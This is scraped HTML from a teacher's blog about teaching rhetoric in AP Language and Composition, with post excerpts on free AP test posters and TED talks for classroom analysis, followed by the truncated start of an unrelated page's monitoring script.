rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-794" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/07/07/essential-tools-for-teaching-rhetoric-logos/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-790" class="post-790 post type-post status-publish format-standard hentry category-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/" rel="bookmark"><time class="entry-date published updated" datetime="2018-05-03T19:25:07-06:00">May 3, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/" rel="bookmark">It&#8217;s AP Test Time! Freebies for You</a></h2> </header> <div class="entry-content"> <p>AP tests are right around the corner (next week!), and I put together a couple of classroom posters for you. You can download them for FREE at my Teachers Pay Teachers shop. Enjoy! CLICK HERE for the AP Lang &amp; Comp poster.  CLICK HERE for the AP Lit &amp; Comp poster. </p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-790" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-790" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-790" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-790" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-790" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/05/03/its-ap-test-time-freebies-for-you/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <article id="post-783" class="post-783 post type-post status-publish format-standard hentry category-teaching no-featured-image"> <div class="entry-body"> <header class="entry-header"> <div class="entry-meta"> <span class="posted-on"><a href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/" rel="bookmark"><time class="entry-date published updated" datetime="2018-04-16T15:11:42-06:00">April 16, 2018</time></a></span> <span class="byline"><span class="author vcard"><a class="url fn n" href="https://rhetorstoolbox.com/author/rhetorstoolbox/">rhetorstoolbox</a></span></span> <span class="cat-links"><a href="https://rhetorstoolbox.com/category/teaching/" rel="category tag">Teaching</a></span> </div><!-- .entry-meta --> <h2 class="entry-title"><a href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/" rel="bookmark">5 TED Talks for the AP Lang &amp; Comp Classroom</a></h2> </header> <div class="entry-content"> <p>Engaging, informative, provocative--TED talks are the perfect tool for the English language arts classroom. In my AP Lang &amp; Comp class, they are a refreshing source of high-quality rhetoric for analysis. Before I show students a TED talk, I make sure to do four things: Set a purpose for viewing. Students must always write something &hellip; <a href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/" class="more-link">Continue reading <span class="screen-reader-text">5 TED Talks for the AP Lang &amp; Comp Classroom</span></a></p> <div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-icon sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a rel="nofollow noopener noreferrer" data-shared="sharing-twitter-783" class="share-twitter sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=twitter" target="_blank" title="Click to share on Twitter"><span></span><span class="sharing-screen-reader-text">Click to share on Twitter (Opens in new window)</span></a></li><li class="share-facebook"><a rel="nofollow noopener noreferrer" data-shared="sharing-facebook-783" class="share-facebook sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=facebook" target="_blank" title="Click to share on Facebook"><span></span><span class="sharing-screen-reader-text">Click to share on Facebook (Opens in new window)</span></a></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=email" target="_blank" title="Click to email this to a friend"><span></span><span class="sharing-screen-reader-text">Click to email this to a friend (Opens in new window)</span></a></li><li class="share-print"><a rel="nofollow noopener noreferrer" data-shared="" class="share-print sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/" target="_blank" title="Click to print"><span></span><span class="sharing-screen-reader-text">Click to print (Opens in new window)</span></a></li><li class="share-pinterest"><a rel="nofollow noopener noreferrer" data-shared="sharing-pinterest-783" class="share-pinterest sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=pinterest" target="_blank" title="Click to share on Pinterest"><span></span><span class="sharing-screen-reader-text">Click to share on Pinterest (Opens in new window)</span></a></li><li><a href="#" class="sharing-anchor sd-button share-more"><span>More</span></a></li><li class="share-end"></li></ul><div class="sharing-hidden"><div class="inner" style="display: none;"><ul><li class="share-linkedin"><a rel="nofollow noopener noreferrer" data-shared="sharing-linkedin-783" class="share-linkedin sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=linkedin" target="_blank" title="Click to share on LinkedIn"><span></span><span class="sharing-screen-reader-text">Click to share on LinkedIn (Opens in new window)</span></a></li><li class="share-reddit"><a rel="nofollow noopener noreferrer" data-shared="" class="share-reddit sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=reddit" target="_blank" title="Click to share on Reddit"><span></span><span class="sharing-screen-reader-text">Click to share on Reddit (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-tumblr"><a rel="nofollow noopener noreferrer" data-shared="" class="share-tumblr sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=tumblr" target="_blank" title="Click to share on Tumblr"><span></span><span class="sharing-screen-reader-text">Click to share on Tumblr (Opens in new window)</span></a></li><li class="share-pocket"><a rel="nofollow noopener noreferrer" data-shared="" class="share-pocket sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=pocket" target="_blank" title="Click to share on Pocket"><span></span><span class="sharing-screen-reader-text">Click to share on Pocket (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-telegram"><a rel="nofollow noopener noreferrer" data-shared="" class="share-telegram sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=telegram" target="_blank" title="Click to share on Telegram"><span></span><span class="sharing-screen-reader-text">Click to share on Telegram (Opens in new window)</span></a></li><li class="share-jetpack-whatsapp"><a rel="nofollow noopener noreferrer" data-shared="" class="share-jetpack-whatsapp sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=jetpack-whatsapp" target="_blank" title="Click to share on WhatsApp"><span></span><span class="sharing-screen-reader-text">Click to share on WhatsApp (Opens in new window)</span></a></li><li class="share-end"></li><li class="share-skype"><a rel="nofollow noopener noreferrer" data-shared="sharing-skype-783" class="share-skype sd-button share-icon no-text" href="https://rhetorstoolbox.com/2018/04/16/5-ted-talks-for-the-ap-lang-comp-classroom/?share=skype" target="_blank" title="Click to share on Skype"><span></span><span class="sharing-screen-reader-text">Click to share on Skype (Opens in new window)</span></a></li><li class="share-end"></li></ul></div></div></div></div></div> </div><!-- .entry-content --> </div> <!-- .entry-body --> </article><!-- #post-## --> <nav class="navigation posts-navigation" role="navigation"> <h2 class="screen-reader-text">Posts navigation</h2> <div class="nav-links"><div class="nav-previous"><a href="https://rhetorstoolbox.com/page/2/" >Older posts</a></div></div> </nav> </main> </div> <aside id="secondary" class="widget-area" role="complementary"> <section id="tag_cloud-3" class="widget widget_tag_cloud"><h2 class="widget-title">What&#8217;s Popular?</h2><div class="tagcloud"><a href="https://rhetorstoolbox.com/tag/advanced/" class="tag-cloud-link tag-link-604508184 tag-link-position-1" style="font-size: 8pt;" aria-label="advanced (1 item)">advanced</a> <a href="https://rhetorstoolbox.com/tag/argument/" class="tag-cloud-link tag-link-25468 tag-link-position-2" style="font-size: 13.25pt;" aria-label="argument (2 items)">argument</a> <a href="https://rhetorstoolbox.com/tag/argumentation/" class="tag-cloud-link tag-link-205134 tag-link-position-3" style="font-size: 8pt;" aria-label="argumentation (1 item)">argumentation</a> <a href="https://rhetorstoolbox.com/tag/back-to-school/" class="tag-cloud-link tag-link-1185 tag-link-position-4" style="font-size: 8pt;" aria-label="Back to School (1 item)">Back to School</a> <a href="https://rhetorstoolbox.com/tag/canvas/" class="tag-cloud-link tag-link-53176 tag-link-position-5" style="font-size: 8pt;" aria-label="canvas (1 item)">canvas</a> <a href="https://rhetorstoolbox.com/tag/classroom-management/" class="tag-cloud-link tag-link-604508182 tag-link-position-6" style="font-size: 8pt;" aria-label="classroom management (1 item)">classroom management</a> <a href="https://rhetorstoolbox.com/tag/close-reading/" class="tag-cloud-link tag-link-169474 tag-link-position-7" style="font-size: 8pt;" aria-label="close reading (1 item)">close reading</a> <a href="https://rhetorstoolbox.com/tag/costa/" class="tag-cloud-link tag-link-303544 tag-link-position-8" style="font-size: 13.25pt;" aria-label="Costa (2 items)">Costa</a> <a href="https://rhetorstoolbox.com/tag/curiosity/" class="tag-cloud-link tag-link-3638 tag-link-position-9" style="font-size: 8pt;" aria-label="curiosity (1 item)">curiosity</a> <a href="https://rhetorstoolbox.com/tag/debate/" class="tag-cloud-link tag-link-12634 tag-link-position-10" style="font-size: 8pt;" aria-label="debate (1 item)">debate</a> <a href="https://rhetorstoolbox.com/tag/discussion/" class="tag-cloud-link tag-link-15352 tag-link-position-11" style="font-size: 8pt;" aria-label="discussion (1 item)">discussion</a> <a href="https://rhetorstoolbox.com/tag/essential-tools/" class="tag-cloud-link tag-link-95215 tag-link-position-12" style="font-size: 8pt;" aria-label="essential tools (1 item)">essential tools</a> <a href="https://rhetorstoolbox.com/tag/gifted-and-talented/" class="tag-cloud-link tag-link-604508183 tag-link-position-13" style="font-size: 8pt;" aria-label="gifted and talented (1 item)">gifted and talented</a> <a href="https://rhetorstoolbox.com/tag/instruction/" class="tag-cloud-link tag-link-604508186 tag-link-position-14" style="font-size: 8pt;" aria-label="instruction (1 item)">instruction</a> <a href="https://rhetorstoolbox.com/tag/learning/" class="tag-cloud-link tag-link-604508187 tag-link-position-15" style="font-size: 8pt;" aria-label="learning (1 item)">learning</a> <a href="https://rhetorstoolbox.com/tag/lesson-planning/" class="tag-cloud-link tag-link-44000 tag-link-position-16" style="font-size: 8pt;" aria-label="Lesson Planning (1 item)">Lesson Planning</a> <a href="https://rhetorstoolbox.com/tag/management/" class="tag-cloud-link tag-link-4236 tag-link-position-17" style="font-size: 8pt;" aria-label="management (1 item)">management</a> <a href="https://rhetorstoolbox.com/tag/movement/" class="tag-cloud-link tag-link-16185 tag-link-position-18" style="font-size: 8pt;" aria-label="movement (1 item)">movement</a> <a href="https://rhetorstoolbox.com/tag/personal-connection/" class="tag-cloud-link tag-link-392154 tag-link-position-19" style="font-size: 8pt;" aria-label="personal connection (1 item)">personal connection</a> <a href="https://rhetorstoolbox.com/tag/questioning/" class="tag-cloud-link tag-link-161299 tag-link-position-20" style="font-size: 13.25pt;" aria-label="questioning (2 items)">questioning</a> <a href="https://rhetorstoolbox.com/tag/rhetorical-analysis/" class="tag-cloud-link tag-link-1797986 tag-link-position-21" style="font-size: 22pt;" aria-label="rhetorical analysis (5 items)">rhetorical analysis</a> <a href="https://rhetorstoolbox.com/tag/rhetorical-strategies/" class="tag-cloud-link tag-link-6946276 tag-link-position-22" style="font-size: 8pt;" aria-label="rhetorical strategies (1 item)">rhetorical strategies</a> <a href="https://rhetorstoolbox.com/tag/teaching/" class="tag-cloud-link tag-link-1591 tag-link-position-23" style="font-size: 13.25pt;" aria-label="Teaching (2 items)">Teaching</a> <a href="https://rhetorstoolbox.com/tag/teaching-strategies/" class="tag-cloud-link tag-link-604508188 tag-link-position-24" style="font-size: 8pt;" aria-label="teaching strategies (1 item)">teaching strategies</a> <a href="https://rhetorstoolbox.com/tag/ted-talks/" class="tag-cloud-link tag-link-314027 tag-link-position-25" style="font-size: 8pt;" aria-label="TED Talks (1 item)">TED Talks</a> <a href="https://rhetorstoolbox.com/tag/time/" class="tag-cloud-link tag-link-604508189 tag-link-position-26" style="font-size: 8pt;" aria-label="time (1 item)">time</a> <a href="https://rhetorstoolbox.com/tag/waiting/" class="tag-cloud-link tag-link-604508185 tag-link-position-27" style="font-size: 8pt;" aria-label="waiting (1 item)">waiting</a></div> </section></aside> </div> <footer id="colophon" class="site-footer" role="contentinfo"> <div class="footer-widgets clear"> <div class="widget-areas"> <div class="widget-area"> <section id="blog_subscription-3" class="widget widget_blog_subscription jetpack_subscription_widget"><h2 class="widget-title">Follow Blog via Email</h2> <form action="#" method="post" accept-charset="utf-8" id="subscribe-blog-blog_subscription-3"> <div id="subscribe-text"><p>Enter your email address to follow this blog and receive notifications of new posts by email.</p> </div> <p id="subscribe-email"> <label id="jetpack-subscribe-label" class="screen-reader-text" for="subscribe-field-blog_subscription-3"> Email Address </label> <input type="email" name="email" required="required" class="required" value="" id="subscribe-field-blog_subscription-3" placeholder="Email Address"/> </p> <p id="subscribe-submit"> <input type="hidden" name="action" value="subscribe"/> <input type="hidden" name="source" value="https://rhetorstoolbox.com/"/> <input type="hidden" name="sub-type" value="widget"/> <input type="hidden" name="redirect_fragment" value="blog_subscription-3"/> <button type="submit" name="jetpack_subscriptions_widget" > Follow </button> </p> </form> </section><section id="wpcom_social_media_icons_widget-5" class="widget widget_wpcom_social_media_icons_widget"><h2 class="widget-title">Social</h2><ul><li><a href="https://www.pinterest.com/rhetorstoolbox/" class="genericon genericon-pinterest" target="_blank"><span class="screen-reader-text">View rhetorstoolbox&#8217;s profile on Pinterest</span></a></li></ul></section> </div><!-- .widget-area --> </div><!-- .widget-areas --> </div><!-- .footer-widgets --> <div class="site-info"> <a href="https://wordpress.com/?ref=footer_custom_powered">Powered by WordPress.com</a>. </div><!-- .site-info --> </footer> </div> <!-- --> <div style="display:none"> </div> <script type="text/javascript"> window.WPCOM_sharing_counts = {"https:\/\/rhetorstoolbox.com\/2019\/04\/07\/no-time-to-wait\/":952,"https:\/\/rhetorstoolbox.com\/2019\/02\/23\/three-low-prep-classroom-debate-strategies-that-rock\/":563,"https:\/\/rhetorstoolbox.com\/2019\/01\/12\/five-sentence-structures-every-student-should-adapt-from-martin-luther-king-jr\/":859,"https:\/\/rhetorstoolbox.com\/2018\/12\/29\/three-ways-to-jazz-up-your-lesson-plans\/":723,"https:\/\/rhetorstoolbox.com\/2018\/12\/22\/25-creative-argument-writing-prompts-for-middle-and-high-school-students\/":803,"https:\/\/rhetorstoolbox.com\/2018\/11\/03\/teaching-shakespeare-you-need-these-anchor-charts\/":815,"https:\/\/rhetorstoolbox.com\/2018\/09\/23\/why-you-should-be-using-imitation-exercises-to-teach-writing\/":807,"https:\/\/rhetorstoolbox.com\/2018\/07\/07\/essential-tools-for-teaching-rhetoric-logos\/":794,"https:\/\/rhetorstoolbox.com\/2018\/05\/03\/its-ap-test-time-freebies-for-you\/":790,"https:\/\/rhetorstoolbox.com\/2018\/04\/16\/5-ted-talks-for-the-ap-lang-comp-classroom\/":783}; </script> <div id="sharing_email" style="display: none;"> <form action="/" method="post"> <label for="target_email">Send to Email Address</label> <input type="email" name="target_email" id="target_email" value="" /> <label for="source_name">Your Name</label> <input type="text" name="source_name" id="source_name" value="" /> <label for="source_email">Your Email Address</label> <input type="email" name="source_email" id="source_email" value="" /> <input type="text" id="jetpack-source_f_name" name="source_f_name" class="input" value="" size="25" autocomplete="off" title="This field is for validation and should not be changed" /> <img style="float: right; display: none" class="loading" src="https://rhetorstoolbox.com/wp-content/plugins/jetpack/modules/sharedaddy/images/loading.gif" alt="loading" width="16" height="16" /> <input type="submit" value="Send Email" class="sharing_send" /> <a rel="nofollow" href="#cancel" class="sharing_cancel" role="button">Cancel</a> <div class="errors errors-1" style="display: none;"> Post was not sent - check your email addresses! </div> <div class="errors errors-2" style="display: none;"> Email check failed, please try again </div> <div class="errors errors-3" style="display: none;"> Sorry, your blog cannot share posts by email. </div> </form> </div> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=5.2'></script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-content/themes/ixion/assets/js/navigation.js?ver=20151215'></script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-content/themes/ixion/assets/js/skip-link-focus-fix.js?ver=20151215'></script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-content/plugins/jetpack/modules/theme-tools/responsive-videos/responsive-videos.min.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://rhetorstoolbox.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=7.3.1'></script> <script type='text/javascript'> var windowOpen; jQuery( document.body ).on( 'click', 'a.share-twitter', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-facebook', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-linkedin', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-tumblr', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtumblr', 'menubar=1,resizable=1,width=450,height=450' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-pocket', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcompocket', 'menubar=1,resizable=1,width=450,height=450' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-telegram', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' ); return false; }); var windowOpen; jQuery( document.body ).on( 'click', 'a.share-skype', function() { // If there's another sharing window open, close it. if ( 'undefined' !== typeof windowOpen ) { windowOpen.close(); } windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' ); return false; }); </script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'115910843',post:'0',tz:'-6',srv:'rhetorstoolbox.com'} ]); _stq.push([ 'clickTrackerInit', '115910843', '0' ]); </script> </body> </html> <!-- generated in 0.161 seconds 100829 bytes batcached for 300 seconds -->
0
<!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en-US" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <meta charset="utf-8" /><script type="text/javascript">window.NREUM||(NREUM={}),__nr_require=function(e,n,t){function r(t){if(!n[t]){var o=n[t]={exports:{}};e[t][0].call(o.exports,function(n){var o=e[t][1][n];return r(o||n)},o,o.exports)}return n[t].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<t.length;o++)r(t[o]);return r}({1:[function(e,n,t){function r(){}function o(e,n,t){return function(){return i(e,[c.now()].concat(u(arguments)),n?null:this,t),n?void 0:this}}var i=e("handle"),a=e(3),u=e(4),f=e("ee").get("tracer"),c=e("loader"),s=NREUM;"undefined"==typeof window.newrelic&&(newrelic=s);var p=["setPageViewName","setCustomAttribute","setErrorHandler","finished","addToTrace","inlineHit","addRelease"],d="api-",l=d+"ixn-";a(p,function(e,n){s[n]=o(d+n,!0,"api")}),s.addPageAction=o(d+"addPageAction",!0),s.setCurrentRouteName=o(d+"routeName",!0),n.exports=newrelic,s.interaction=function(){return(new r).get()};var m=r.prototype={createTracer:function(e,n){var t={},r=this,o="function"==typeof n;return i(l+"tracer",[c.now(),e,t],r),function(){if(f.emit((o?"":"no-")+"fn-start",[c.now(),r,o],t),o)try{return n.apply(this,arguments)}catch(e){throw f.emit("fn-err",[arguments,this,e],t),e}finally{f.emit("fn-end",[c.now()],t)}}}};a("actionText,setName,setAttribute,save,ignore,onEnd,getContext,end,get".split(","),function(e,n){m[n]=o(l+n)}),newrelic.noticeError=function(e,n){"string"==typeof e&&(e=new Error(e)),i("err",[e,c.now(),!1,n])}},{}],2:[function(e,n,t){function r(e,n){if(!o)return!1;if(e!==o)return!1;if(!n)return!0;if(!i)return!1;for(var t=i.split("."),r=n.split("."),a=0;a<r.length;a++)if(r[a]!==t[a])return!1;return!0}var o=null,i=null,a=/Version\/(\S+)\s+Safari/;if(navigator.userAgent){var u=navigator.userAgent,f=u.match(a);f&&u.indexOf("Chrome")===-1&&u.indexOf("Chromium")===-1&&(o="Safari",i=f[1])}n.exports={agent:o,version:i,match:r}},{}],3:[function(e,n,t){function r(e,n){var t=[],r="",i=0;for(r in e)o.call(e,r)&&(t[i]=n(r,e[r]),i+=1);return t}var o=Object.prototype.hasOwnProperty;n.exports=r},{}],4:[function(e,n,t){function r(e,n,t){n||(n=0),"undefined"==typeof t&&(t=e?e.length:0);for(var r=-1,o=t-n||0,i=Array(o<0?0:o);++r<o;)i[r]=e[n+r];return i}n.exports=r},{}],5:[function(e,n,t){n.exports={exists:"undefined"!=typeof window.performance&&window.performance.timing&&"undefined"!=typeof window.performance.timing.navigationStart}},{}],ee:[function(e,n,t){function r(){}function o(e){function n(e){return e&&e instanceof r?e:e?f(e,u,i):i()}function t(t,r,o,i){if(!d.aborted||i){e&&e(t,r,o);for(var a=n(o),u=v(t),f=u.length,c=0;c<f;c++)u[c].apply(a,r);var p=s[y[t]];return p&&p.push([b,t,r,a]),a}}function l(e,n){h[e]=v(e).concat(n)}function m(e,n){var t=h[e];if(t)for(var r=0;r<t.length;r++)t[r]===n&&t.splice(r,1)}function v(e){return h[e]||[]}function g(e){return p[e]=p[e]||o(t)}function w(e,n){c(e,function(e,t){n=n||"feature",y[t]=n,n in s||(s[n]=[])})}var h={},y={},b={on:l,addEventListener:l,removeEventListener:m,emit:t,get:g,listeners:v,context:n,buffer:w,abort:a,aborted:!1};return b}function i(){return new r}function a(){(s.api||s.feature)&&(d.aborted=!0,s=d.backlog={})}var 